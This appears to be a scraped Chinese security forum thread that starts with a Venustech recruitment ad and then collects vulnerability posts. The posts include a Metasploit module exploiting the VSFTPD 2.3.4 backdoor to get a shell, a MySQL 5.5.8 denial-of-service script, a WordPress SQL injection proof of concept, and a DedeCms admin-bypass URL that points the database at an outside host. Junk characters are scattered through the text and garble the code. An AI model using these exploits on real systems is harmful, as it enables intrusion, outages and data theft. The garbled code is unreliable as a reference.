最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。3 L7 j3 ~$ v3 M! m* A1 B

    5 F; T+ A) v/ e% d" ^% S1 J

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    * U6 c$ D" S- g$ q安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    2 @8 @, A+ F: {精通C语言编程

    2.
      l! S9 }4 A! d! Z2 G' x7 J3 ?熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
    , s" I) L' `2 e精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.5 b+ v' ~8 r9 `5 L4 u% ?# n4 C
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    & O: O& v" X5 ^  X: l' P" m熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.! Y, b1 w" [6 e  v
    负责产品的系统测试、集成测试工作

    2.
    : a7 K1 P1 w, z" C负责产品用例的编写,执行、修改

    3.
    % |* t2 M% l2 P0 ?6 D7 C负责产品性能的测试

    4.
    * y0 P* X) F& ]. @- s负责对外项目的支持和测试工作

    岗位要求:

    1.
    : @  w0 I$ b1 l+ n2 y! b# Z掌握基本的tcp/ip知识

    2.+ A" p; y+ C) {$ L
    数通基础好

    3.
    2 D: o( m" c/ S( F对linux有一定的基础

    4.' h1 ~: k3 d5 q( \
    掌握数据库的搭建和使用

    5.0 ^! \8 g! l* I! c
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.  W( \5 N2 M) u9 ]0 C8 K/ G# p% ^
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    / i7 }( C' C0 G' L/ `8 d% x熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    ' j  l/ @9 t1 X* m& u对网络安全设备在网络中的部署有一定的认识

    9.
    6 O/ I% K, U6 a$ M6 C8 m掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    - G6 B1 c" V# Q( D; P6 `
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    " b; K# n) ]& ]' b  r" ~, h/ P7 H  k
    对服务客户的技术支持

    3.
    / p- y( ~( D) d0 _. }: F0 G
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    + h: S% D& w7 R, L2 z3 y+ A( C
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    & l6 C6 d" V7 p  ]7 [& _3 r6 u& t
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################6 Q& R! N; l/ C" J
      ]' V/ q8 |  L  m' V

    + n+ I; v3 O# `0 |/ P% P1 |
    + P% p* V9 g4 a* G% H3 |: w# grequire msf/core
    + u( V# ^% Q$ B3 y4 I  @7 E! S& x1 Z9 J/ N/ p. i* {
    class Metasploit3 < Msf::Exploit::Remote5 q8 E' w( A1 a, Z, i
    Rank = ExcellentRanking) x+ h1 l7 R5 t& h
    ; F: p: K# x: _- n: z# Z# o4 w
    include Msf::Exploit::Remote::Tcp
    1 c- D, X1 i$ x3 Y' X; ^' ~& v1 e5 F- j& n4 `
    def initialize(info = {})
    ( u! _: O- G( ]7 w. T( X- Zsuper(update_info(info
    ( Q6 s+ e7 C! U8 C" x1 [Name => VSFTPD v2.3.4 Backdoor Command Execution
    ; ]5 G+ r. `* h+ S4 ~& g" W, d$ @* oDescript_ion => %q{
    6 S% h0 M1 I$ n: M4 W1 k. U: zThis module exploits a malicious backdoor that was added to the VSFTPD download
    & D  Z+ _: i% G2 garchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between8 n0 z1 F  u3 W( s
    June 30th 2011 and July 1st 2011 according to the most recent information. c  l+ u8 Q4 y8 ^) ^7 p7 c3 |
    available. This backdoor was removed on July 3rd 2011.
    ; f) j6 _, V& {8 A. b' A}4 y& u. Q8 V; m8 d" [4 T
    Author => [ hdm mc ]
    : m2 K2 O5 m$ v* W' ~0 CLicense => MSF_LICENSE
    3 h5 t9 k: Y! U+ t3 x( e8 Z& tVersion => $Revision: 13099 $
    * D* Z7 V" U9 z) h6 R6 tReferences =>
    - ~6 m1 {& o. w/ U( l. i[  R0 V$ R) U6 e4 r3 K
    [ URL http://pastebin.com/AetT9sS5]
    : e. ]! x# Q5 }* Q' u[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]2 |  l; Q0 Q" z, O3 e+ z
    ]* l  A9 D) R/ s0 l- e, B0 N' B
    Privileged => true
    $ ^# c+ o& O4 X$ a. WPlatform => [ unix ]
    1 ?3 u" `/ N4 R8 ZArch => ARCH_CMD
    , u. c% J; Z% K/ }9 J( ?Payload =>! H6 k5 O; c$ o, d# Y, C
    {
    # A  E. \1 |3 Q5 [& c5 E+ ASpace => 2000
    0 T& S! H# R) \3 `7 m0 WBadChars => 7 b) ]6 k1 e* i5 l& ]
    DisableNops => true
    3 f' C$ N  m( _  S% `Compat =>
    0 |4 X$ X5 @$ ~{
    + D! R6 V3 B  sPayloadType => cmd_interact
    % h5 ^& |9 p/ T; y9 W, NConnectionType => find) s, P$ N6 v# T, y* b: U
    }" D$ J' S+ `; c- p: y
    }
    5 U8 s- ?1 V% m% QTargets =>' ?( s% q) x* h; r' A6 i7 X- |) B
    [
    6 w& r! P" f5 g: y0 `6 x% |' J$ T[ Automatic { } ]: _% ]5 R/ h" {) ^6 f& A  n. t
    ]
    2 K2 n. t% z) tDisclosureDate => Jul 3 2011& t  L. r, c; `7 i
    DefaultTarget => 0))
    # X3 h1 d4 S8 q' S5 Y9 v/ I
    / v/ l( z8 h5 L% uregister_options([ Opt::RPORT(21) ] self.class)
    8 l! N0 I# s4 m8 d: W$ `  n# Yend8 |6 g; S$ [9 ^: d: Y9 C' b8 @, R

    0 g) Z7 l  V1 V. d: D/ d% R( ldef exploit
    $ I% s( g8 ?+ V6 ^0 u3 r3 |, a7 F' B" q2 O( p: x
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    7 i  H$ V1 `# A/ _7 `if nsock+ q# `6 C! [) T  k) j9 j2 N& X
    print_status(The port used by the backdoor bind listener is already open). k% k0 ^5 V( ~8 w6 |
    handle_backdoor(nsock)
    7 p( _4 Y' A6 B" l# P' R/ Freturn5 m: p) t/ [- S0 c
    end* z& V9 j4 Y) @

    # p+ f! t8 ?9 e; _' q- V# A# Connect to the FTP service port first+ a3 y5 o% w4 F! u6 j
    connect
    % g) }* @0 x2 e$ N& z  c
    & d8 q8 G+ g$ h6 ~0 J. Obanner = sock.get_once(-1 30).to_s
    ) |/ r, e# R9 }% c" hprint_status(Banner: #{banner.strip})
    ( e# ]; |, Z- y! T/ `; J; ~; B' m" J& H  c3 P3 c
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)9 m# i! t' l; m% O: x0 W6 H, _
    )4 M8 a: V/ q* y% m
    resp = sock.get_once(-1 30).to_s* n8 M. L, z( a4 ^6 y) O
    print_status(USER: #{resp.strip})# C/ p+ Z& B6 i

    # r1 w' _& s. W- z0 fif resp =~ /^530 /; V: L' d7 c2 ^: s
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)9 W7 b+ X6 ^2 z* M
    disconnect
    . E4 Y" z# w# V, oreturn
    9 w0 w  w' O! yend; v! B8 {9 \. Q  n0 C' H5 V" g

      n( O5 R) s" O" h) ?& L+ s$ f1 nif resp !~ /^331 /
    ( F! v+ f$ d' l5 B& U5 ]print_error(This server did not respond as expected: #{resp.strip})
    ( q2 L3 k. R( x6 ]) t% {disconnect
    0 e( v" I0 E4 o' s1 u4 r( ?return9 @: l2 W  V) }0 N5 B$ V
    end5 U% _$ H  [2 K$ Q9 E
    . e: [& n$ S  y; ~3 o: Z
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}' a- j1 d* P* T. P
    )( O3 M* X  X, J* c8 {

    ; Z& \$ M9 F; f$ g# Do not bother reading the response from password just try the backdoor% l( S& V9 O0 n- x9 y3 A
    nsock = self.connect(false {RPORT => 6200}) rescue nil' F2 W+ n# |  c4 _1 K
    if nsock
    4 y) U* K. y  ?2 s& Q+ a$ ^print_good(Backdoor service has been spawned handling...)* B( U. O2 I+ w8 {7 t, g# O, O3 {6 ~
    handle_backdoor(nsock)
    3 n) u# f5 T( b4 r( J0 ?return, x, t/ u( C1 R* S' p7 r
    end$ J+ I; I% }0 K5 F2 N0 r
    0 }. S6 J+ \2 p* P. U( p) s
    disconnect
    : \) P1 g9 X) l" R+ e5 x/ O# D( n4 P8 ?% s$ M
    end
    1 S( a6 k0 F# n# @& K% d9 Z
    : b7 \8 V5 t( U/ G8 Q: Hdef handle_backdoor(s)
    2 v' ]/ s- ]) s+ h* O5 O) m- j6 x# J* k: a) ^/ O, c  X
    s.put(id
    ; K4 y0 j% N) g" ~' H4 d  G- J! E)
    & n) @5 Q1 x1 }' ]0 s& i% n; X. r% D. Q9 M
    r = s.get_once(-1 5).to_s
    9 ?7 J% _8 |# V# r6 W# @. }if r !~ /uid=/7 e, t: Q) _6 U7 D
    print_error(The service on port 6200 does not appear to be a shell)& E( {) o' W" y- l9 t! m
    disconnect(s)
    2 |/ ]7 d8 g( {# L% |return$ t- `9 I4 ~0 M( l$ |
    end- r6 M# a5 O; Q& G6 c' p

    * f2 z& n% F) Bprint_good(UID: #{r.strip})( j8 E8 m8 D9 i' q+ j

    & W7 S6 g! u0 n5 ~' q- _s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)% h2 ^& O6 w  d; W- q
    handler(s)
    7 z& a1 W( ^; bend
    + M/ l2 t8 U3 w
    8 z4 ]. Q7 h. d& xend复制代码
    0 t5 S! v8 T- w& d2 h, j
    3 A" O1 u/ {% r9 ^. c* e8 R
    9 I4 }2 h- \& v. H% I" Z- G& I3 k) Q+ [+ N  F( J8 H3 H4 y$ h
    . @' p! z" {  ?, x
    2 V: o! c% C3 J5 \, m& s

    1 s8 l9 J# u  f8 S1 ]5 z& A7 @2 m
    ; d" u( ]+ ?* n  Z$ [
    ) z! Y( n7 s4 \8 J, l: s( o
    / d2 z$ r7 W  _: m" z: a
    # N* @. t6 `% B2 k
    4 V8 L; s# O; \3 h! Z( R' I! W/ c8 _0 l+ ^7 Z
      F, V/ E( ?! L+ f! z* ]# r
    + W+ J6 c- D% M6 ^& }' H

    ! V# B" d+ m  b% l+ \( H
    9 Q+ I2 ]. V+ \# d/ k8 L1 j: u7 E  s& B' _" o* r& V' m

    % k! e- F4 J- p7 I2 R% G公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:6 R- f* o- i, |" w# ]# c
      
    - S, @0 s- [/ j" ^: d     3 F5 Z* P: p. X1 ]: d
      - L/ s9 H! u; t+ D
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    . M, O2 w& X# T3 }4 Aallows an authenticated user to execute arbitrary SQL commands via the id
    / G% K% b6 I& Q) eparameter to wp-admin/admin.php. + \: j1 K6 }% x2 H' Q) \2 d
      " S: Z$ w1 J' o  b0 B
       . B6 x% K0 W3 }. @9 C
      
    & h$ \+ @; q1 Z) A% ]% R: u2. Proof of Concept:' q) W4 }/ h0 m% I3 }8 z5 v
      # W- w" A7 u# L# b& p
       0 @* O) [2 o8 K8 J! E& B4 C. o
      8 Y2 h# y2 g  \% T% ?
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    - i, `! M$ q6 s1 p8 _/ M* C=1 AND SLEEP(10)
    ( V8 K5 \( {, q5 C. N! D+ h
    ; t; y5 W' z0 K/ A. _# V  4 [! I  [. A3 M5 s* W  ]
       & U+ C* h, \$ p' d% f" F  o7 ]) s. @9 s7 e
      " f6 S- m% ]. S
    3. Solution:3 U0 b- i, |4 o' n2 ~
      
    , x+ a' Z6 d* Q0 o     
    * H5 G; e! N) c  9 u; g( j# G/ T5 N$ u9 S
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
      u, b0 x% s% T2 y  g6 c3 x. tfor a hotfix.
    , I3 j( S# u+ \3 ~/ V! G' G) v2 b  2 ^* w3 x) d7 y( R  G' X7 X( @8 R$ e
       
    ) k9 {- `7 q9 i' K" m: p  * k% C& q( V: L; K8 B
    4. Reference:
      K1 ^( h. P1 N! P, W% l  $ ~% Y. @7 f% ?* i5 N' C
       
    $ Z5 }5 [& L3 q  
    . F* Y2 U& X* n$ A- O+ y2 Y7 i. bhttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    # l) |* F5 |% S/ U; wction-sqli/
      C* _) H4 S% b2 ^" r* j* n  ! M& G* l( a6 W' I9 _) t
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    " ^$ ?& I6 K+ b9 u; T4 t! s' ]& u, [# }2 \- x3 s

    2 S2 _- O: D% f1 W  q
    ) T2 E. Z8 k7 T1 Z3 f: q
    0 {( ~0 |# @+ S- E1 _' k5 X. W& o! i: {8 H2 Y7 q" M, U9 j0 U% x2 U
    # A5 S  W. I4 Y- Z8 z2 ?4 Z
    8 h0 s) u% h6 @9 U

    4 [# p% h1 p" T8 {& ]1 A# S4 G
    3 r) T1 y+ g$ H" [% i( R$ ]! ^$ @9 B; e  O* O$ A6 ~  P) x/ S3 [

    3 Y3 t) J( f3 y3 V# i) _& e& J% T: z4 l: o- j1 I8 ]& {
    , ]/ N" u9 t; c; L+ R. ^" ]
    ! i: t' ~- ?8 }% s+ o
    1 S; O) a; k0 r

    : W3 W: ~: Z2 Q. z& o
      L' P% o+ w4 C* d
    & {' }; S8 i1 q( y/ n公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys2 ?% N3 `+ B  v4 m$ L" u
    3 H, S4 U9 O" n4 ^/ x, N, W
    print "
    7 x1 v5 _$ h' Y7 @6 e"2 [! e' s/ y% H% @' \7 P
    print "----------------------------------------------------------------"7 Q  `$ v! d2 [1 @& D" R" `
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    ) }( s0 H+ O% X3 C3 {print "| Level Smash the Stack                                         |"' A& \3 D  n: p" g5 c$ t5 R! ^
    print "----------------------------------------------------------------"4 J' q; ~% E9 N. S3 I6 W1 Z& T
    print "
    " Y: }0 e. Z4 O. r"
    / L1 k* [. m% j7 S1 W4 y 8 h; h$ u7 Z: c# y% E! q0 G1 c
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"% ^6 ]5 g; _+ C6 d- |, R
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    9 D; r. V. a# D$ ~
    " |0 W0 v0 z9 Dbuf2=("x11x00x00x00x03set autocommit30")
    ; e5 Y- ~% E& w9 r# n  \. Q
    & R0 X" e* S% f5 sdef usage():& P8 l2 L- u" {( }7 W. s% }' m/ q' a
    print "usage : ./mysql.py <victim_ip>"
    ) x5 v+ U, s9 x9 V( J$ m6 k1 zprint "example: ./mysql.py 192.168.1.22": W7 ]. z( \0 f

    3 _: ^7 J2 M" |" A / N, c! M: T4 |) [/ s5 }
    def main():% Q3 Y( _5 _+ O  u5 {  w
    if len(sys.argv) != 2:
    - s0 @& k# D) |; _usage()) Z+ c- j8 j+ a' |
    sys.exit()! g8 M. c, f8 r
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)7 [1 w. {# |: s, N- p

    2 P  _4 _) K# K$ ?! wHOST = sys.argv[1]
    9 \5 `- F- k! cPORT = int(3306)( O& @6 c8 f# p0 a" j
    s.connect((HOST,PORT))) w1 K, o# l3 E% X# i/ L6 U' C6 x$ c' I/ l
    print "
  • Connect"
      j" L! e. s. k8 F) S" ~* ]3 es.send(buf)
    ; V. j7 Q3 R* }$ T, x. Y5 Qprint "
  • Payload 1 sent"$ q: d. M1 l  x& r9 ^
    s.send(buf2)
    : s8 m" |, \1 c* hprint "
  • Payload 2 sent# U9 a0 s# j3 Y  J3 S7 }" o
    ", "
  • Run again to ensure it is down..0 G' ~2 ^; p! ?7 g
    "
    ' E, D$ b/ u" {5 {7 _# s+ |s.close()
    0 u: c* J0 A3 C# x + R: ]* o4 X4 q3 t7 u
    if __name__ == "__main__":% c, U# c8 ?6 z5 c
    main()
    - t. v7 G  Y! c5 w' z" D! X. |- \3 I: J( n. ^. u' D, O. I
    3 p6 y- G- X+ x+ v8 }

    5 }) U, K$ {! y$ M& r( ]
    * `) Q2 q: w2 _7 d+ F* X; i1 j/ k$ E0 ~8 o

    2 s9 k8 d7 F% G0 C( p
    / }( O& t7 V; y8 a4 O9 Q
    - Q" Z$ V# A9 L, N' T* ]! O  p* R4 b4 f# d' X

    # r' S% {  H6 Y6 j% K* }' \
    ' i9 m. R$ H/ _# n1 G
    ! {  d( J9 _3 f1 B5 p& q
    . A" i# q2 v' c3 E8 o- N) F. [! B' {* \+ K1 q. n# e

    & M) O( t. T2 Q
    . D1 o' s" \9 b1 o' f5 J# Q2 ~5 p" J1 @; w' S

    & h( o+ X. m, |. ?) J公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    / w' b0 M4 ^8 k" F+ M
    http://www.sitedir.com.cn/video/4.swf) @) Q' o3 N) C% j: x1 `
    2 {" |5 D2 H! Q$ }
    ' j* {9 K8 r) k

    3 |. X/ S% d4 b1 g2 ?" k, o
    $ x9 I% v( r) R4 ]) z8 v6 X) _# ^) f0 Y% u2 U* }

    , X4 M5 j& }9 R6 t  b4 Z" |+ v$ o$ c% c5 \2 b# B, J* i

    " {9 @9 i& j! e9 m; {' h4 X6 [% F$ e
    1 _9 U  z- j( [7 R
    1 m- u9 ?7 t7 d, P3 u
    4 ~3 K/ W% }- \  ^

    . K/ {8 P& n' M
    & x' X- E+ \4 F& J6 N7 ]& v& w/ Y' k/ E

    $ F5 w# e1 i) W, f8 p5 `- ^8 |4 \: e. N  a( D  v
    , z( o  `4 j1 q9 {9 _0 A- S
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    ! V% F4 b$ }+ ]+ M# g) S% N8 ?8 s
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    % Z7 H( T0 J+ y) H2 n% b
    此漏洞的前提是必须得到后台路径才能实现
    ! J3 v  R# g$ Q( j
    官方临时解决办法:

    ! T% l2 c$ [) c0 |3 Z3 S! Q9 A/ b
    找到include/common.inc.php文件,把:
    - ^. j* D, z# o8 s$ d- O
        foreach($_REQUEST as $_k=>$_v)3 T8 M4 t8 m. V- Q% m' {5 m7 q
        {+ m9 l. ?$ `: Y9 m& H
            var_dump($_k);! J8 _) f8 D0 S+ E
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
      n  a7 k1 u3 T# |" }) Y( o        {- o6 I. c. C4 v+ V+ {5 i  ^$ i
                exit('Request var not allow!');
    2 D: P. g$ b' S) T        }
    $ Y+ k& [4 e7 f* D  y# i) k9 M, W    }

      e2 a0 W& i, m0 o4 a
    换成:
    ) Z8 `' U5 W# \9 f2 I: ^: D
        //检查和注册外部提交的变量0 Z4 [' ~0 R) X7 G- ]) A
        function CheckRequest(&amp;$val) {) h/ Y2 _5 u) X- @0 v  J
            if (is_array($val)) {, M' A: C7 Y4 [- u. _8 M5 A
                foreach ($val as $_k=>$_v) {
    : }2 b& k6 v& j+ U                CheckRequest($_k);) L8 T3 u* y9 _( y3 X
                    CheckRequest($val[$_k]);( d7 c! ~- ]. m4 Q, L, T
                }& g5 Y) P+ U* U5 @, O7 ^2 C$ w
            } else7 {5 ?$ e* r; v( }
            {
    6 y" d: F" ~6 p3 l8 I1 N            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    4 M; @+ K, q5 Y" h+ Q# f            {" a6 k+ }, Y4 h% K2 |# Z% F
                    exit('Request var not allow!');, z& _9 e3 H, p
                }. N) b/ G1 X$ h8 i) S
            }# H$ V# Q' X' v& W, ~" s; g
        }; J6 A7 H/ n1 |1 ~9 m  Q
        CheckRequest($_REQUEST);; p9 I% @6 x2 P+ u% Z

    + a9 U+ A9 r8 O  ^- ~! r* q3 b9 m% v  g3 {5 R! R# A7 C
    ) s; O7 ~( u8 d& Q4 I

    4 ]8 c& N% M& \$ r( `, s% e3 @$ r' N' O$ k

    + p; [" A" Y# `! s. I8 y: L! n$ G
    4 B* W' p/ d% p5 K$ [/ H4 B; @( d0 @1 s1 {$ ^* ]1 C
    / ], t7 {+ O1 |2 W$ W
    ( S; e+ t- x# R8 {

    7 `' s' a7 P! R) u1 C! Y& b
    , m3 p: p% Q$ w' b/ D: ^; R! I" p+ j* l

    7 k: m( [1 [+ U- M
    7 R5 @( [1 u5 h/ a$ [& i/ z6 j/ I9 v! C) r7 b
    , V! P* p# e; G
    4 a$ e: w+ B$ k3 Y

    * ^) U6 H3 O$ W- P" D9 C% s  F: t( Y公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    1 _& w( r# U+ Y; C8 h
    ) t4 [7 p; `( v) M7 nhttp://www.sitedir.com.cn/video/8.swf[/quote]
    & o7 U6 t6 M/ c8 |
    $ A# f5 I$ Y/ R  _
    7 d/ h# R4 @# Q% C; S: _; W5 O4 A1 c  O7 Q/ ?7 \& }
    : _" K/ k0 W. r+ e1 i
    + Q. H9 L/ O% O9 n& h3 ^: P

    * h0 O1 X  Z, b& \0 B% I( K, T
      K0 _/ J5 q5 M+ d' e- b' B* S2 [% `: \- J& u0 H$ f

    ) ~  {: L  I0 {% y2 j" ~7 S6 i. E' z% h1 [8 C" j# d

    + N$ e5 Q/ }6 j9 e4 F) B0 \% G: c' `8 Y. v
    . K0 R4 p2 x8 ^, X/ U# @  y
    7 }' Y& g. H5 n
    $ X* i/ q! e, i1 z
    ) ^/ R+ ?. V" i8 L& W
    ! \/ k5 c! o) O) V9 c* q
    5 C, R6 a$ d3 |. e
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    8 @1 V& |' v- x' C% u3 P
    影响版本:, o$ [, Q* G, s8 s
    Django 1.2.5
    3 S( }  b' d- e8 ZDjango 1.3 beta 1  z- Z  x& b+ B2 e( ^
    Django 1.2.47 L& c6 J" D. S
    Django 1.2.2: c. u0 ~* C' g# g& n
    Django 1.2
    0 t. u/ M: v+ M! V9 S; i* L: ~
    漏洞描述:
    2 W5 E6 z, `% y
    Django是一款开放源代码的Web应用框架,由Python写成。
    / w; h$ u7 g5 B$ t8 z9 ADjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    " d. F5 c9 l( E1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    0 r( N( C4 i8 ~+ w2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。0 D  f4 F, T( m2 A" j: ~; q+ D
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。/ z% [( Y2 a* ]  v4 Y. w$ ^# A
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    + {8 w; f: g% t" Y+ |& C/ k
    细节参考:
    $ h* o  t. G7 l  k3 U# f4 S5 S7 [- Ihttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/4 ^: R. G1 j8 m1 T* p6 b
    http://secunia.com/advisories/45939/
    / E6 f: f0 S* `  m/ `0 Q
    * V/ t: P1 g* |+ t

      t* }) {; X; t+ K( m
    * u4 t" Q+ X" M6 s: b! R/ G! _9 i* I* N4 `
    + F# D" G( H# ?: R

    ' m$ |: K3 d% A) z/ T! Y5 W9 I9 V- H; K( a+ ?
    - L5 j$ _+ J0 K& @! I  O( w; E( C
    1 w. w* E: g" `; u" E
    7 q- {. e% |5 p- e7 g4 C
    $ z5 V+ |# }- |5 u" j3 ]5 s* f
    $ K5 e$ A; w1 t. B1 @6 U. {
    6 r- h; G: K, ~0 @

    : _( l2 ~  a9 A0 t) e* Y" [! q8 P2 y& Z6 J' d: L: A) P. A

    1 l; r1 m0 Q+ a8 T6 K2 m4 w4 j: a7 d( H* y

    & O- C9 B# f, O* j0 [) U5 h$ g, ?2 f0 b' K/ W' T( o+ m
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    # ?9 @" R) _, c影响版本: McAfee LinuxShield <= 1.5.1
    ( a, ?% T' Q2 F0 |/ b. ]远程攻击: Yes : m7 I. _$ V6 C2 ]( _
    本地溢出: Yes
    ; V1 S5 [/ M( A. d背景阅读:
    5 }6 k* ~* j6 b, ]===========
    ( T6 `9 T0 Q" B# Q# {$ ^) v3 }! b, F1 e6 M! q: T' ^# Z
    LinuxShield detects and removes viruses and other potentially unwanted" @" U) h  I" \" t  L$ {$ b. l  S( h
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    # n$ z+ m% R: Z8 V; y# O4 W/ x$ Pscanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
    8 U& q) d! Y$ Z, {* h# |6 canti-virus products.
    9 x% ]% O/ Y+ S! q* Y* o" k& ]" Q. d: h+ t
    Although a few years ago, the Linux operating system was considered a( |: w$ z1 L+ A9 i
    secure environment, it is now seeing more occurrences of software
    8 l) z! M1 }) Z  b* Z- j; Especifically written to attack or exploit security weaknesses in- ?& M* ^# n: Z& a5 K! \. H1 X
    Linux-based systems. Increasingly, Linux-based systems interact with" B7 X- f! e* v( C
    Windows-based computers. Although viruses written to attack Windows-1 N; z+ T$ s  O3 o. a
    based systems do not directly attack Linux systems, a Linux server
    ' }+ U* G0 H$ R, X7 I% hcan harbor these viruses, ready to infect any client that connects to6 \& |: l; }. x& n9 X' p$ V
    it.
    3 y) \0 ?; Z5 Z2 w3 z/ i' g/ u2 {. x+ b2 G- w- e# f* L9 v) B
    When installed on your Linux systems, LinuxShield provides protection
    8 \) _& ?0 F; p' L, C  Gagainst viruses, Trojan horses, and other types of potentially" F% o) N2 F; B  Y
    unwanted software.7 b) T' o7 t: V9 q

    . m1 {: V' x6 r- D+ u& \3 Y. }LinuxShield scans files as they are opened and closed* {( Q7 }  D- j
    ?&amp;#65533;&amp;#65533; a technique2 r6 w2 n/ E% X! J9 w& l) m
    known as on-access scanning. LinuxShield also incorporates an
    0 J$ W. |: Z' u7 jon-demand scanner that enables you to scan any directory or file in. T4 F  j6 s* ~0 e3 F* r
    your host at any time.( `( J8 c% J" W" i

    & v5 ?) A# [. V7 b+ s* n2 nWhen kept up-to-date with the latest virus-definition (DAT) files,
    " ]3 x9 [* B) H! a; DLinuxShield is an important part of your network security. We1 Z/ g' R) |% n. C& G% l
    recommend that you set up an anti-virus security policy for your4 a: X+ ?0 Y1 a; P3 e; P* U
    network, incorporating as many protective measures as possible.
    ! o; {! ^4 E2 `# e0 s% J- J5 D1 E- F$ k7 `
    LinuxShield uses a web-browser interface, and a large number of, k# r( _/ Z" A1 L' c+ i
    LinuxShield installations can be centrally controlled by ePolicy
    0 ?2 v: ~0 H* W; I7 i# oOrchestrator.
    6 F7 b: B7 z6 n9 v# S/ m
